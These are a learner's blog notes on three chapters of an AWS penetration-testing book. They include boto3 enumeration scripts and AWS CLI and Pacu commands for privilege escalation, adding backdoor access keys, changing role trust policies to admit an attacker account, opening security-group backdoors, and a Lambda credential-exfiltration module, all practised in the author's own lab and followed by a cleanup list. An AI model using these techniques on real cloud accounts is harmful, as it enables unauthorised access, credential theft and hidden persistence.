
Hands-On AWS Penetration Testing with Kali Linux Section 4: AWS Identity Access Management Configuring and Securing

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Ch 9 – Identity Access Management on AWS

IAM for AWS seems to function as you would expect IAM to function. Some good intro/reminder info is covered so even if you have little experience with IAM, you should have enough info to go on to work through this section.

IAM users are creds for something needing long-term access. IAM roles provide temporary creds to a user/service/app on an as-needed basis. The default is a 1 hr lifespan before expiration. Using roles allows for stricter auditing and permissions management. Yay for roles – I can see a lot of benefits for using this type of access even if it might be a little more hassle.

Groups are groups – used to provide a common set of permissions. In AWS, a single user can be a member of up to 10 separate groups. A group can hold up to the total number of users allowed in the account. I can think of enterprise structures that might have difficulty with the 10 group limit. Hopefully with integration of AD or other services, this limitation would be manageable.

Creating IAM users, groups, roles, and associated privileges

There’s an IAM page in the AWS console, so that’s where you’ll go to work on IAM. When you go to IAM, it’s currently showing a “Security Status” checkup that covers the basics of AWS IAM security. Honestly, the IAM dashboard and environment should feel familiar if you’ve worked with IAM elsewhere. If not, this is a good way to get some practice since IAM is an included AWS feature and you only pay for the resources used.

For users, you can pick Programmatic access (access key ID and secret access key for AWS API access via AWS CLI or SDK) and/or AWS Management Console access (password, with autogenerate and custom options). Permissions can be set by IAM group, copied from another user, or set by attaching an existing IAM policy (including a bunch of AWS-created policies). Looking through the AWS policies, most look self-explanatory based on the title. Details can be found in the “Policies” tab of the IAM console. Groups are limited to 10 attached policies. Policies can be AWS managed (the predefined ones) or Customer managed. Modifying the AWS managed ones can be done easily enough by accessing the JSON and copying it to a new policy to be modified. The IAM console makes it easy to check the permissions and policies for the elements – really nice job by the AWS developers.

Roles cannot be added to groups but can have policies attached/removed. The trust relationship feature is what allows the roles to grant temporary permissions. Trust relationships are defined in the assume role policy JSON document. To see the policy, click on the “Trust relationships” tab from the Summary page and click “Show policy document”. Going into this more in ch 11 because roles are a common way of establishing persistence.

Policy structure… see the documentation. Key parts to know are Version, Statement, Sid (optional), Effect, Action, Resource (sometimes required), and Condition (optional). Understanding IAM policies is important because being able to read them and know what would be allowed is helpful for offense and defense. Wildcard characters (*) are allowed, so seeing one in a policy should either make you happy (red team) or paranoid (blue team).
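To make the structure concrete, here’s a small hand-made example policy (all names, ARNs, and IPs are hypothetical, not from the book) expressed as a Python dict, plus a quick check for the wildcard pattern mentioned above:

```python
import json

# Hypothetical example policy showing the key parts:
# Version, Statement, and per-statement Sid/Effect/Action/Resource/Condition.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowBucketRead",
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": "arn:aws:s3:::example-bucket/*",
            "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}},
        },
        {
            # The wildcard that makes red teams happy and blue teams paranoid
            "Sid": "AllowEverything",
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*",
        },
    ],
}

# Flag any statement that allows * on * (the red-flag pattern)
wildcards = [s["Sid"] for s in policy["Statement"]
             if s["Effect"] == "Allow" and s.get("Action") == "*" and s.get("Resource") == "*"]
print(json.dumps(wildcards))
```

Skimming for that Allow/*/* combination is a quick first pass when reviewing dumped policy documents.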

Inline policies are created on a user, role, or group and cannot be reused. For security purposes, they should be avoided. For a pen testing situation, they can come in handy because they are stealthier than managed policies. Inline policies work like managed policies, but the API permissions that control them are separate from those for managed policies. So when you’ve compromised a user, interaction may be allowed with one type but not the other.

Using IAM access keys

Install the AWS CLI if you haven’t already (check by using aws --version). Add creds by using aws configure --profile <profileName> and following the prompts. Update credentials using the same command, and add more credentials by creating additional profiles as needed. Since this was set up using --profile, you have to include the appropriate profile with each command.

The GetCallerIdentity call of the Security Token Service (STS) is available to all users and helps enumerate common account information – UserId, Account, and Arn (Amazon Resource Name).

aws sts get-caller-identity --profile <profileName>

You can list services available to this user and how to reference them with aws a (an intentionally invalid command – the error basically returns what could have been used instead of the invalid a argument). The same idea can be used to list the APIs for each service. Nice little trick for enumeration. Help is available as is typical to get more information.

List instances in the default region with aws ec2 describe-instances --profile <profileName>. Specify a region by adding --region <region>. You can change the output by using --output <outputFormat>.

Get information about the security groups with aws ec2 describe-security-groups --group-ids <securityGroupID> --profile <profileName>. This will display the firewall rules.

Signing AWS API requests manually

AWS API calls typically require certain data to be signed – signatures are valid for 5 minutes by default, leaving a brief window for replay attacks. The AWS CLI and SDKs deal with signing automatically. But there are certain times when manual signing is required – if the programming language doesn’t have an AWS SDK or if full control of the request is needed.

Manual signing requires:

  1. Create a canonical request,
  2. Create a string to sign,
  3. Calculate the signature of the string, and
  4. Add the signature to the HTTP request.
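The steps above can be sketched in code. This is a minimal sketch of step 3 (calculating the signature) using only the standard library, assuming the canonical request and string to sign from steps 1-2 have already been built – the key, date, and string-to-sign values here are placeholders, not a real request:

```python
import hashlib
import hmac

def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()

def derive_signing_key(secret_key: str, date: str, region: str, service: str) -> bytes:
    # SigV4 key derivation chain: secret -> date -> region -> service -> "aws4_request"
    k_date = _hmac(('AWS4' + secret_key).encode('utf-8'), date)
    k_region = _hmac(k_date, region)
    k_service = _hmac(k_region, service)
    return _hmac(k_service, 'aws4_request')

def sign(secret_key: str, date: str, region: str, service: str, string_to_sign: str) -> str:
    # Final signature: HMAC-SHA256 of the string to sign, hex-encoded,
    # which then goes into the Authorization header (step 4)
    key = derive_signing_key(secret_key, date, region, service)
    return hmac.new(key, string_to_sign.encode('utf-8'), hashlib.sha256).hexdigest()

# Placeholder inputs for illustration only
sig = sign('EXAMPLEKEY', '20150830', 'us-east-1', 'iam', 'AWS4-HMAC-SHA256\n...')
print(sig)
```

The AWS Signature Version 4 documentation has full worked examples with official test vectors if you need to verify an implementation.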

Ch 10 – Privilege Escalation of AWS Accounts Using Stolen Keys, Boto3, and Pacu

Permission enumeration and (if possible) escalation is an important part of AWS (and pretty much any) pentesting. Enumerating permissions in a way that minimizes noise is important to avoid detection. Testing permissions by attempting to access resources leads to access denied errors, which gets noisy. Permission enumeration also can help get information about the environment. Knowing permissions is also important to help identify any known privilege escalation methods. You may have to make assumptions if unable to get a full list of permissions.

The book was super vague about script creation to import boto3 into python3. Not sure why a script was necessary, but ok. The boto3 documentation just uses import from within python.

Ah, after reading through, what is being done is the enumeration script is being built a section at a time. I did not find that clear even after reading through and going back to the start of building the script. But that’s what is going on. On one hand, I like the explanation of the script line by line. On the other, it would have been nice for that to have been clear from the beginning. Anyways…

Create the file for the script – (or whatever you want to call it) and enter the info with vim or nano (I’m using vim to force myself to practice with it, but good grief the default color scheme is terrible – changing it helps considerably):

#!/usr/bin/env python3
# Import needed libraries
import boto3
import json

# Set up creds
session = boto3.session.Session(profile_name='<profileName>', region_name='<region>')
client = session.client('ec2')

# Create list to store enumerated instances
instances = []

# Make initial API call w MaxResults=1000 (max) to reduce number of calls
response = client.describe_instances(MaxResults=1000)

# Top level of results is "Reservations" so iterate through those
# Check if any instances are present
for reservation in response['Reservations']:
	if reservation.get('Instances'):
		# Merge into list
		instances.extend(reservation['Instances'])

# Check response['NextToken'] for value to determine if have all results
while response.get('NextToken'):
	# Run API call again
	response = client.describe_instances(MaxResults=1000, NextToken=response['NextToken'])
	# Iterate reservations and add to instances
	for reservation in response['Reservations']:
		if reservation.get('Instances'):
			instances.extend(reservation['Instances'])

# Save to file in current directory
with open('./ec2-instances.json', 'w+') as f:
	# Use json library to dump
	json.dump(instances, f, indent=4, default=str)

Then make it executable – chmod +x ./ – and run the script. In case you were wondering about /usr/bin/env python3 versus /usr/bin/python3, this discussion on Stack Exchange shed some light on the why. The code should make sense – it’s all pretty straightforward. Coding in Python always makes me feel like it’s writing with bad grammar though.

Add S3 enumeration

Add S3 permissions if your IAM user doesn’t have them. Then add additional code to enumerate the S3 info. Create a client to target S3, list the buckets, add them to a list, and list out the files in a dictionary. Downloading the files is not recommended because it can raise alarms based on the cost incurred.

# Create S3 client, response, and variables
client = session.client('s3')
response = client.list_buckets()
bucket_names = []
bucket_objects = {}

# Iterate through response and pull bucket names
for bucket in response['Buckets']:
	bucket_names.append(bucket['Name'])

# Loop through buckets
for bucket in bucket_names:
	# First API call
	response = client.list_objects_v2(Bucket=bucket, MaxKeys=1000)
	# Check for objects returned
	if response.get('Contents'):
		bucket_objects[bucket] = response['Contents']
	else:
		bucket_objects[bucket] = []
	# Check if received all results, loop until have everything
	while response['IsTruncated']:
		response = client.list_objects_v2(Bucket=bucket, MaxKeys=1000, ContinuationToken=response['NextContinuationToken'])
		if response.get('Contents'):
			bucket_objects[bucket].extend(response['Contents'])
for bucket in bucket_names:
	with open('./{}.txt'.format(bucket), 'w+') as f:
		for bucket_object in bucket_objects[bucket]:
			f.write('{} ({} bytes)\n'.format(bucket_object['Key'], bucket_object['Size']))

Dumping all account info

Info from accounts can be retrieved in multiple ways. So time to do IAM enumeration to pull info about the IAM service and AWS account. The API is paginated, so more lists are required. Create your file and then edit in vim:

touch ./
vim ./

Script details:

#!/usr/bin/env python3
# Account enumeration script

import boto3
import json

session = boto3.session.Session(profile_name='NAME', region_name='REGION')
client = session.client('iam')

# Declare variables to store enumerated info
user_details = []
group_details = []
role_details = []
policy_details = []

# Make first API call  
response = client.get_account_authorization_details()

# Store first set of data
if response.get('UserDetailList'):
	user_details.extend(response['UserDetailList'])
if response.get('GroupDetailList'):
	group_details.extend(response['GroupDetailList'])
if response.get('RoleDetailList'):
	role_details.extend(response['RoleDetailList'])
if response.get('Policies'):
	policy_details.extend(response['Policies'])
# Check for more data
while response['IsTruncated']:
	response = client.get_account_authorization_details(Marker=response['Marker'])
	# Store data again
	if response.get('UserDetailList'):
		user_details.extend(response['UserDetailList'])
	if response.get('GroupDetailList'):
		group_details.extend(response['GroupDetailList'])
	if response.get('RoleDetailList'):
		role_details.extend(response['RoleDetailList'])
	if response.get('Policies'):
		policy_details.extend(response['Policies'])

# Open each file and dump info
with open('./users.json', 'w+') as f:
	json.dump(user_details, f, indent=4, default=str)
with open('./groups.json', 'w+') as f:
	json.dump(group_details, f, indent=4, default=str)
with open('./roles.json', 'w+') as f:
	json.dump(role_details, f, indent=4, default=str)
with open('./policies.json', 'w+') as f:
	json.dump(policy_details, f, indent=4, default=str)

Running this, I got an error when calling the GetAccountAuthorizationDetails operation. I took that to mean that the account was lacking the necessary IAM permissions. This happened because I didn’t set up my user quite the same way as the book. Made a quick group to allow IAM read-only access and added my user, then the script ran with no problems.

I like to keep things organized, so I went back and added making a directory to store my results based off the answers in this Stack Overflow. If you add the directories, make sure to include them with the open statements so things get created in the right place.

# Add directories for results to the scripts as appropriate
# Remember to add the directory to the path of the open statements
from pathlib import Path
Path("./directoryname").mkdir(parents=True, exist_ok=True)

For pentesting, I’d probably use a clean box for each client, so that level of organization should be clean enough. If I were going to be testing a large number, I’d look into a way to automate directory creation with a name for each target. I posted my full scripts with the file directory information on my GitHub.
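Automating the per-target directory creation could be as simple as a small helper like this (the base path and subdirectory names here are my own, not from the book):

```python
from pathlib import Path

def make_target_dirs(target: str, base: str = './results') -> Path:
    """Create a per-target results directory tree (hypothetical layout)."""
    target_dir = Path(base) / target
    # One subdirectory per enumeration script's output
    for sub in ('01-EC2-S3', '02-IAMenum'):
        (target_dir / sub).mkdir(parents=True, exist_ok=True)
    return target_dir

d = make_target_dirs('client-a')
print(d)
```

Then each script's open() calls would use the returned path, so results for different engagements stay separated.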

Permission enumeration

This will extend the IAM script to determine exact permissions by correlating the info with data in the files. In a pentest scenario, the username might not be known, so the API can be used to get the information. Then info that might be attached to the user is checked. You’ll end up with policy documents for inline and managed policies attached to the user and groups the user is a member of. In the Kindle version, this gets a bit jumbled, so make sure you take the time to understand the structure of the code and indentation levels.

# Analyze policies related to user
username = client.get_user()['User']['UserName']
current_user = None
for user in user_details:
	if user['UserName'] == username:
		current_user = user
# Create empty list to store policies
my_policies = []

# Check for attached inline policies
if current_user.get('UserPolicyList'):
	# Iterate through to pull documents
	for policy in current_user['UserPolicyList']:
		# Add policy to list
		my_policies.append(policy['PolicyDocument'])

# Check for attached managed policies
if current_user.get('AttachedManagedPolicies'):
	# Iterate through list
	for managed_policy in current_user['AttachedManagedPolicies']:
		# Note policy ARN for future reference
		policy_arn = managed_policy['PolicyArn']
		# Iterate through policies stored in policy_details to find policy
		for policy_detail in policy_details:
			# Check if found
			if policy_detail['Arn'] == policy_arn:
				# Determine default version to know what to grab
				default_version = policy_detail['DefaultVersionId']
				# Iterate versions to find the one needed
				for version in policy_detail['PolicyVersionList']:
					# Check for match
					if version['VersionId'] == default_version:
						# Add policy to list
						my_policies.append(version['Document'])
						# Found so exit loop
						break
				# Found so exit loop
				break

# Check for groups
if current_user.get('GroupList'):
	# Iterate through groups
	for user_group in current_user['GroupList']:
		# Iterate through groups to find this one
		for group in group_details:
			if group['GroupName'] == user_group:
				# Check for inline policies
				if group.get('GroupPolicyList'):
					# Iterate through inline policies
					for inline_policy in group['GroupPolicyList']:
						my_policies.append(inline_policy['PolicyDocument'])
				# Check for managed policies
				if group.get('AttachedManagedPolicies'):
					for managed_policy in group['AttachedManagedPolicies']:
						# Grab ARN
						policy_arn = managed_policy['PolicyArn']
						# Find policy in list
						for policy in policy_details:
							if policy['Arn'] == policy_arn:
								default_version = policy['DefaultVersionId']
								for version in policy['PolicyVersionList']:
									if version['VersionId'] == default_version:
										my_policies.append(version['Document'])
										break
								break

with open('./02-IAMenum/my-user-permissions.json', 'w+') as f:
	json.dump(my_policies, f, indent=4, default=str)

So now you have 2 scripts – 1 that enumerates EC2 and S3 information and 1 that enumerates IAM information.

An alternate method

As mentioned (and as found when I forgot to add the IAM permissions), the script won’t work if the iam:GetAccountAuthorizationDetails permission isn’t present, but there are alternatives available. If the user has other IAM permissions, it might be possible. No script is provided, but a guide is.


  1. Check for GetAccountAuthorizationDetails permission – if there, use script.
  2. Use iam:GetUser API to determine user
  3. Get policies for user
    1. iam:ListUserPolicies
    2. iam:GetUserPolicy
    3. iam:ListAttachedUserPolicies
    4. iam:GetPolicy – determine default versions
    5. iam:GetPolicyVersion – get policy document
  4. Use iam:ListGroupsForUser to get groups
  5. Get policies for groups
    1. iam:ListGroupPolicies
    2. iam:GetGroupPolicy
    3. iam:ListAttachedGroupPolicies
    4. iam:GetPolicy – determine default
    5. iam:GetPolicyVersion – get policy document

This requires a lot more API calls, is noisier, and is thus more likely to get you caught. But it’s an option if you need it. You’re going to want to have the IAM API reference handy while working on this script. I’m going to keep working on this, but it’s going to take a lot of research for me – someone with more experience could probably do it fairly quickly.
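To make the guide above more concrete, here’s my rough sketch of steps 2-3 (the user-policy half – the group steps 4-5 follow the same pattern with the Group APIs). This is a sketch, not the book’s script; the client is passed in so it could be a boto3 IAM client or a stub with the same methods, and pagination is omitted for brevity:

```python
def enum_user_policies(iam):
    """Gather a user's inline and managed policy documents via individual IAM APIs."""
    # Step 2: iam:GetUser to determine the current user
    username = iam.get_user()['User']['UserName']
    policies = []

    # Step 3.1-3.2: list inline policy names, then fetch each document
    for name in iam.list_user_policies(UserName=username)['PolicyNames']:
        policies.append(
            iam.get_user_policy(UserName=username, PolicyName=name)['PolicyDocument'])

    # Step 3.3-3.5: list attached managed policies, find the default
    # version of each, then fetch that version's document
    for attached in iam.list_attached_user_policies(UserName=username)['AttachedPolicies']:
        arn = attached['PolicyArn']
        version = iam.get_policy(PolicyArn=arn)['Policy']['DefaultVersionId']
        policies.append(
            iam.get_policy_version(PolicyArn=arn, VersionId=version)['PolicyVersion']['Document'])

    return policies
```

Passing the client in also makes the logic testable offline against a fake client before burning noisy API calls in a real engagement.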


Pacu, from Rhino Security Labs, is an open source AWS exploitation toolkit. Use Git to pull it down via git clone. Installed and got an error message about s3transfer, but it seems functional. Start a new session (these are like projects so you can keep engagements separate). Pacu has a cool feature where it will mask the user agent of certain pentesting distros to help prevent AWS’s security measures (GuardDuty) from keying on the activity. Import previously loaded keys with import_keys <profilename>. Then whoami should return info about that awscli profile. Check available modules with ls. We’re going to check out the iam__enum_permissions module – note that the separator after iam is a double underscore (__). This will get info about the selected user. Run whoami again and note the difference. There should be a lot more information on the user now, including permissions, policies, etc.

Moving on to attempting privilege escalation. Conveniently, there is a module for that – iam__privesc_scan. Well, that was frighteningly quick and effective. This worked because of the PutUserPolicy permission that was added for this section (mental note – take that off when done). You can run iam__enum_permissions and whoami to verify. You should see the policy name in the policies list and, in the permissions section, a part with * for the action and * under “Resources” (this is easy to miss as you scroll through the output). You can also see the policy in the IAM console. Just for my sanity, I removed the new policy and the PutUserPolicy permission and tried to escalate again – this time it failed. Put the vuln back in place and run again to continue…

You can run the AWS CLI commands from within Pacu to make life easier. You can see if various logging and monitoring capabilities are enabled with run detection__enum_services. That’s a nice feature – figure out how much noise you might generate if people are watching. Some interesting modules to try: aws__enum_account (enumerate info about the current account), aws__enum_spend (see where money is being spent to identify services without having to poke a lot of things), and ec2__download_userdata (download and decode EC2 user data – this one complained about needing enumeration done and ran through those with minimal input). EC2 user data may include sensitive info like API keys or passwords, so it’s a handy thing to check. If there is data, it will be downloaded to a folder where it can be reviewed. The book highlighted looking for #cloud-boothook within a script. The #cloud-boothook directive indicates code should run at every boot and can be used for persistence (more on this later apparently – sounds interesting).

Cool chapter, but a lot of material. I plan to keep working on the alternative IAM enumeration script, but it won’t be a priority for me. Hopefully someone else in the book club will have some ideas. With what I’ve done for it so far, I’m learning more about API usage and how Python processes things, so it’s good for me.

Ch 11 – Using Boto3 and Pacu to Maintain AWS Persistence

Persistence is good, and backup plans are a necessity in pentesting. Backup plans should ideally fly under the radar to set up and execute. AWS has some different options for persistence, but you also have more traditional options for persistence available when you target the instances deployed in an AWS environment. This chapter focuses on AWS aspects like user creds, role trust relationships, EC2 security groups, and Lambda functions.

Backdooring Users

For the user portion, the setup in chapter 10 will be used, with the PutUserPolicy and privilege escalation in place. An AWS IAM user can have 2 access keys. If the account you’ve gotten ahold of only has one set up, you could add a second to use for persistence. Effective, but fairly simple to detect and remove. Targeting a different user can be more effective.

Look for other users, find one that doesn’t have 2 keys set up (trying to create a third would be noisy), and create a key for the selected user. This approach can also work for privilege escalation if the first account you accessed has the iam:CreateAccessKey permission. So a big takeaway here is to carefully enumerate your initial creds for potential exploitation paths. If you haven’t built out some other users, you will need to do so. I started by creating an account with just S3 read permission and one with IAM read permissions.

# Check for other users
aws iam list-users --profile <profilename>
# Check existing keys
aws iam list-access-keys --user-name <targeteduser> --profile <profilename>
# Create access key
aws iam create-access-key --user-name <targeteduser> --profile <profilename>
# Store new keys using AWS CLI
aws configure --profile <targeteduser>
# Add keys to Pacu

Pacu also has a module for this – that’s convenient. And short.

run iam__backdoor_users_keys

The default gives a list to choose a user from, but you can also supply a username.

Backdooring Role Trust Relationships

IAM roles are important in AWS and can give specific permissions for a temporary amount of time (1 hr default). Roles can apply to a user, app, AWS service, another AWS account, or just about anything that can access AWS (but not a group).

IAM roles have a trust policy attached that specifies who/what can assume the role and under what conditions. Seems straightforward. This is helpful for pentesters because the role trust policies (in some configurations) can be updated at will and they can give access to other AWS accounts. So update the trust policy of a privileged role to create a trust relationship with your attacker AWS account, and there’s your persistence.

You need to find a suitable target that will let you update the policy and attach another account. Service-linked roles do not allow this – so avoid roles with AWSServiceRoleFor in the name, roles listing an AWS service and Service-Linked role in the trusted entities column, or roles with the path /aws-service-role/. Be cautious eliminating potential targets based solely on name – some may have service in the name but not truly be service-linked roles.

The book talks about a role named Admin. I didn’t remember enumerating roles, so I looked for a potential Pacu module and found iam__enum_users_roles_policies_groups, which would enumerate roles. This pulled 3 roles that were saved in the database. Well, that’s nice. How do you find this data? Apparently by using the data command. You use iam:GetRole and iam:ListRoles to get role info. I found this a little vague. Basically…

aws iam list-roles --profile <profileName>
aws iam get-role --role-name <roleName> --profile <profileName>

Since the Admin role wasn’t there, I presumed I needed to create it. So into AWS Console > Roles > Create Role > pick the ARN you want to target > attach the AdministratorAccess policy > Name > Save. To do this exploit, you will need a separate AWS account to add to the role. Setting up a second account is a minor hassle, but handy, so I went ahead and did it. You will need to make sure the account has sufficient privileges to complete the exploit. It requires taking the AssumeRolePolicyDocument from the role, adding the ARN for the second account, and then updating the role with the new trust policy using:

aws iam update-assume-role-policy --role-name Admin --policy-document <filepath> --profile <profileName>
aws iam get-role --role-name Admin --profile <profileName> #Verify
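For reference, the updated trust policy document passed via --policy-document might look something like this (all account IDs and names here are hypothetical, not from the book):

```python
import json

# Hypothetical updated trust policy: the role's original trusted principal
# (the victim account root) plus the second/attacker account's user ARN
# added as an additional trusted principal.
trust_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:root",
                    "arn:aws:iam::222222222222:user/attacker",
                ]
            },
            "Action": "sts:AssumeRole",
        }
    ],
}

# This JSON is what would be saved to the file referenced by <filepath>
print(json.dumps(trust_policy, indent=4))
```

Keeping the original principal in place matters – if you replace it outright, legitimate use of the role breaks and someone is more likely to notice.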

Be sure to take note of the role’s ARN for future reference. Then confirm by trying to assume the target role from the second (attacker) account.

aws sts assume-role --role-arn <roleARN> --role-session-name PersistenceTest --profile <secondAccount>

You should get a response indicating success, with a SecretAccessKey and a SessionToken. Fairly straightforward. Worked quite well once I got the second account and made sure the user had the correct privileges.

Automating with Pacu

There is a Pacu module to make the process more effective. This will also require a second account. If you leave off the --role-names variable, Pacu will give you a list to choose from.

# From within Pacu
run iam__backdoor_assume_role --role-names Admin --user-arns <secondAccountArn>

Backdooring EC2 security groups

As we’ve learned, EC2 Security Groups are functionally virtual firewalls. Adding a rule can provide a backdoor. Don’t get overexcited and add all the ports – that’s kind of a red flag. Choose a port or a few ports wisely.

See what’s available:

aws ec2 describe-instances --profile <profileName>

Sift through the mounds of info returned to find the instance ID, public IP, and Security Groups for the target instance. Then see what rules exist already:

aws ec2 describe-security-groups --group-ids <securityGroupID> --profile <profileName>

See what’s there and potentially try to play off of an existing rule (for instance opening the same ports for external access). The book example had internal ports frequently associated with MongoDB. The ec2:AuthorizeSecurityGroupIngress API is used to add a rule:

aws ec2 authorize-security-group-ingress --group-id <securityGroupID> --protocol <protocol> --port <port/range> --cidr <CIDRRange>

This returns nothing if successful and an error if not. If successful, test the connection to an EC2 instance in the Security Group. Running this gave me a message that I needed to specify a region, but specifying a region made it cranky too – asking for creds. It apparently wanted all the options:

aws ec2 authorize-security-group-ingress --group-id <securityGroupID> --protocol <protocol> --port <port/range> --cidr <CIDRRange> --region <region> --profile <profileName>

The automated version using Pacu is:

run ec2__backdoor_ec2_sec_groups --ip <CIDRRange> --port-range <port/range> --protocol <protocol> --groups <group@region>

The default is to backdoor all the groups in the current region, but you can specify a specific Security Group. Note that Pacu uses the Security Group name rather than the ID. Remember that even when backdooring, you don’t want to leave the backdoor open for the whole world, so don’t use an all-inclusive CIDR range. And don’t forget to specify the ip, because the default is wide open.
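Not from the book, but a quick sanity check before running the module: Python’s ipaddress module can flag a world-open CIDR (0.0.0.0/0, all of IPv4) before you accidentally backdoor a group for the entire internet:

```python
import ipaddress

def is_world_open(cidr: str) -> bool:
    """Return True if the CIDR covers all of IPv4 (the red-flag 0.0.0.0/0)."""
    return ipaddress.ip_network(cidr) == ipaddress.ip_network('0.0.0.0/0')

# A world-open range vs. a narrow documentation range
print(is_world_open('0.0.0.0/0'), is_world_open('203.0.113.0/24'))
```

The same check is just as useful defensively when reviewing describe-security-groups output for rules someone else left wide open.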

Initial run gave me an error about the index being out of range. Looked at the error log – I had put in a single port, and the parsing got angry because it was looking for the -. Switched it to a single-port range (443-443), and it worked fine.

Also be sure to remove the policies and settings that allow the accounts to be compromised. I’m basically making the parts vulnerable when I’m actively doing the labs, then removing access when done. It gets a little repetitive, but I figure that’s also helping me internalize the different steps. Make sure you give things enough time to update and then check again to make sure nothing has remained open.

Using Lambda functions as persistent watchdogs

I haven’t used Lambda at all, so this should be interesting. Lambda allows you to run serverless code – sounds cool. It can be used to alert on activity in the account to either help us exploit it or tell us we might have been detected. There are other functions of course, but this will be the focus for this part. A good example is triggering when a new user is created. For a function to trigger, a CloudWatch Events rule is needed. This is dependent on CloudTrail logging being enabled in us-east-1, because that is where IAM events are delivered (IAM is a global service). Usually CloudTrail logging will be turned on – best practice is enabling it in all regions. If it’s not, you probably have additional options available to exploit.

When CloudTrail is not set up, there are still management event activity logs for the last 90 days, which are stored and searchable for free. The book doesn’t really say anything about how to set this up to function for the lab. The Getting Started with AWS CloudTrail Tutorial seems like a logical place to start. I went through that and, interestingly, it showed as “Objects may be public”. Looking through the settings, I didn’t see anything allowing public access. I still enabled the “Block public access” option. We’ll see if I regret that decision working through the lab. It said it takes at least 15 minutes to populate, so I came back later to verify logs were being created. And since I’m constantly making accounts vulnerable and then fixing them, there were a lot of IAM logs.

This would take some time and effort, so why not just use Pacu? You will need to set up a server to receive creds. Setting one up in the Kali EC2 instance is probably easiest – AWS provides a public DNS, so should be workable. And since I have to double check my netcat syntax every time – SANS Netcat Cheatsheet. I hope I’m not the only one who often forgets the -v and then has to do a sanity check to make sure it started. Do make sure to open the port in whatever security group you are using.

The Pacu syntax is:

run lambda__backdoor_new_users --exfil-url

Ran this and got an error that it couldn’t find the zipped lambda function. Tried running Pacu as an elevated user just in case, and same error. Tried each of the roles available, same error. Tried going back and backdooring the Admin role, same error. I’m pretty sure from the error logs there’s an issue with the code, but I wanted to try what I could before calling it. I tried the lambda__backdoor_new_roles module to see what would happen, and I got the same error. There is also lambda__backdoor_new_sec_groups, but I’ve got to figure out the zip issue before chasing more rabbits.

I’m going to see what I can find, but wanted to go ahead and post these notes. There might be an update if/when I figure out the zip issue. I didn’t see it listed as an issue on the Pacu github, so it may be a permissions issue. The error is not specific enough to tell, and the error I got wasn’t the same as was listed in the code. The module was last updated 2 years ago, so I don’t think it’s an issue of pulling the wrong code.


This portion really didn’t have much cost associated with it. I have my EC2 instances available still, so there were the on-going costs of those. All in all, running about 10-15 dollars (US) per month. I could have dumped my EC2 instances other than the Kali one, but I’m keeping them for now in case I need them for future labs. Looking ahead, I think I will likely dump all but my Kali instance in the near future.

Note for authors, if you are designing labs that have a cost associated with them, please let your readers know when things are finished. Or really, just make it known regardless because it’s something helpful to share.

Summary of things to check/undo after exploiting all the things

Some of the places to check to button things back up after you have gone through the labs. I believe I’ve caught everything. The big one is the PutUserPolicy because it was the initial piece that led to entry.

  1. PutUserPolicy permission attached to any user
  2. Admin policies added to any user via Pacu
  3. Security Credentials (Access keys) added to any user via Pacu
  4. Admin role (remove the ARN of second account, remove admin capabilities)
  5. Inbound rules on Kali (if used for listening server)


